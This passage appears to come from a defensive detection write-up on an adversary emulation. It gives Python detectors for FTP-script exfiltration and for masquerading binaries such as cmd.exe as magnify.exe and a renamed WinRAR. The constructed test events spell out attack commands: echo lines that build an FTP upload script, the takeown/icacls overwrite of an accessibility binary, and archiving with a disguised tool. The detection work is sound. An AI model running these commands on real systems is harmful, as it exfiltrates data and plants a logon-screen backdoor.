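                                 "echo_lines": len(writers[script]), "ftp_cmdline": text})
    return findings


def _sb(time, line, host="codered"):
    """A 4104 script block line (constructed)."""
    return {"Kind": "scriptblock", "Time": time, "Computer": host, "Text": line, "Image": None}


# Constructed: the script built line by line, then ftp.exe consuming it (192.0.2.10 is a documentation address).
EVENTS = [
    _sb("2018-10-30T17:10:00", "echo open 192.0.2.10 >> ftp.txt"),
    _sb("2018-10-30T17:10:01", "echo ftpuser >> ftp.txt"),
    _sb("2018-10-30T17:10:02", "echo ftppass >> ftp.txt"),
    _sb("2018-10-30T17:10:03", r"echo put C:\$Recycle.Bin\old.rar >> ftp.txt"),
    _sb("2018-10-30T17:10:04", "echo bye >> ftp.txt"),
    {"Kind": "process", "Time": "2018-10-30T17:10:10", "Computer": "codered",
     "Image": r"C:\Windows\System32\ftp.exe", "Text": "ftp -s:ftp.txt"},
    # Benign controls: an echo that appends to a log, and an interactive ftp with no script.
    _sb("2018-10-30T17:20:00", "echo done >> build.log", host="morris"),
    {"Kind": "process", "Time": "2018-10-30T17:21:00", "Computer": "morris",
     "Image": r"C:\Windows\System32\ftp.exe", "Text": "ftp 192.0.2.20"},
]

if __name__ == "__main__":
    for finding in ftp_script_exfil(EVENTS):
        print(finding)
```

Matching on the file's basename is a deliberate approximation, since the echo may use a relative path and the ftp command another; a production version would resolve both against the process's working directory. The cmd.exe variant of the same technique (cmd /c echo ... >> ftp.txt) does create processes, so there the command lines can feed the same function with Kind set to "scriptblock".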

Procedure: magnify.exe (previously overwritten with cmd.exe) launched through RDP connection made to Creeper (10.0.0.4)
Procedure: RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism
Procedure: 'whoami' executed via cmd (the magnify.exe persistence mechanism) through RDP connection made to Creeper (10.0.0.4)
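
Two procedures on this page come down to a binary that is not what its name says: cmd.exe running as magnify.exe here, and WinRAR running as recycler.exe in the collection steps above. The PE version-info OriginalFileName, which Sysmon records on process creation since version 10, exposes both without a hash lookup, and the earlier takeown/icacls/copy sequence on magnify.exe gives a second, independent signal. The following is an added example of both checks; it is not code from the page or from RSA, the events are constructed, and the parent images, paths and command lines are assumptions.

```python
"""Two checks for the magnify.exe backdoor and the renamed archiver above.

tamper_sequences(): per accessibility binary, collect the takeown, the icacls
and the overwrite (a copy/move command line, or a FileCreate on the path) and
report paths that saw at least two of the three.
masquerading(): a process whose PE version-info OriginalFileName (a Sysmon
EID 1 field since Sysmon 10) differs from the name it runs under, reported for
accessibility binaries and for a watchlist of originals (Cmd.Exe running as
magnify.exe, WinRAR.exe running as recycler.exe).
Events are constructed for this example; the parent images, paths and command
lines are assumptions.
"""
from collections import defaultdict
import ntpath
import shlex

ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}
WATCHED_ORIGINALS = {"cmd.exe", "powershell.exe", "winrar.exe", "rar.exe", "7z.exe", "7za.exe"}
TAMPER_VERBS = {"takeown": "takeown", "icacls": "icacls",
                "copy": "overwrite", "move": "overwrite", "xcopy": "overwrite"}


def _name(path):
    return ntpath.basename(path.replace('"', "")).lower()


def _toks(cmdline):
    """Tokenise and unwrap cmd.exe /c so builtins such as copy are classified."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:
        toks = cmdline.split()
    lowered = [t.lower() for t in toks]
    if toks and _name(toks[0]) == "cmd.exe" and "/c" in lowered:
        toks = toks[lowered.index("/c") + 1:]
    return toks


def tamper_sequences(events):
    seen = defaultdict(dict)            # target path -> {step: evidence}
    for ev in events:
        if ev["EventID"] == 11 and _name(ev["TargetFilename"]) in ACCESSIBILITY:
            seen[ev["TargetFilename"].lower()]["overwrite"] = ev["TargetFilename"]
        elif ev["EventID"] == 1:
            toks = _toks(ev["CommandLine"])
            if not toks:
                continue
            verb = _name(toks[0])
            step = TAMPER_VERBS.get(verb[:-4] if verb.endswith(".exe") else verb)
            targets = [t.replace('"', "").lower() for t in toks[1:] if _name(t) in ACCESSIBILITY]
            if step and targets:
                seen[targets[-1]][step] = ev["CommandLine"]   # last path is the destination
    return {path: steps for path, steps in seen.items() if len(steps) >= 2}


def masquerading(events):
    hits = []
    for ev in events:
        if ev["EventID"] != 1 or not ev.get("OriginalFileName"):
            continue
        name, orig = _name(ev["Image"]), ev["OriginalFileName"].lower()
        if orig != name and (name in ACCESSIBILITY or orig in WATCHED_ORIGINALS):
            hits.append((name, orig, _name(ev["ParentImage"])))
    return hits


MAGNIFY = r"C:\Windows\System32\magnify.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; not telemetry from the evaluation.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\takeown.exe", "ParentImage": PS,
     "OriginalFileName": "takeown.exe", "CommandLine": f"takeown /f {MAGNIFY}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\icacls.exe", "ParentImage": PS,
     "OriginalFileName": "icacls.exe", "CommandLine": f"icacls {MAGNIFY} /grant Administrators:F"},
    # 'copy' is a PowerShell alias, so there is no child process; only the FileCreate shows the overwrite.
    {"EventID": 11, "Image": PS, "TargetFilename": MAGNIFY},
    # Later, from the logon screen: Magnifier is started, but the PE is cmd.exe.
    {"EventID": 1, "Image": MAGNIFY, "ParentImage": r"C:\Windows\System32\utilman.exe",
     "OriginalFileName": "Cmd.Exe", "CommandLine": "magnify.exe"},
    {"EventID": 1, "Image": r"C:\$Recycle.Bin\recycler.exe", "ParentImage": PS,
     "OriginalFileName": "WinRAR.exe", "CommandLine": "recycler.exe a old.rar Shockwave_network.vsdx"},
    # Benign control: a case-only difference in OriginalFileName is normal.
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    print(tamper_sequences(EVENTS))
    print(masquerading(EVENTS))
```

The OriginalFileName check costs nothing at runtime and catches the rename at execution, which is where the footnote above says the archiver was eventually identified; the hash and YARA approaches the vendor mentions add coverage for the copy-to-disk step, where no process exists yet to carry a version-info field.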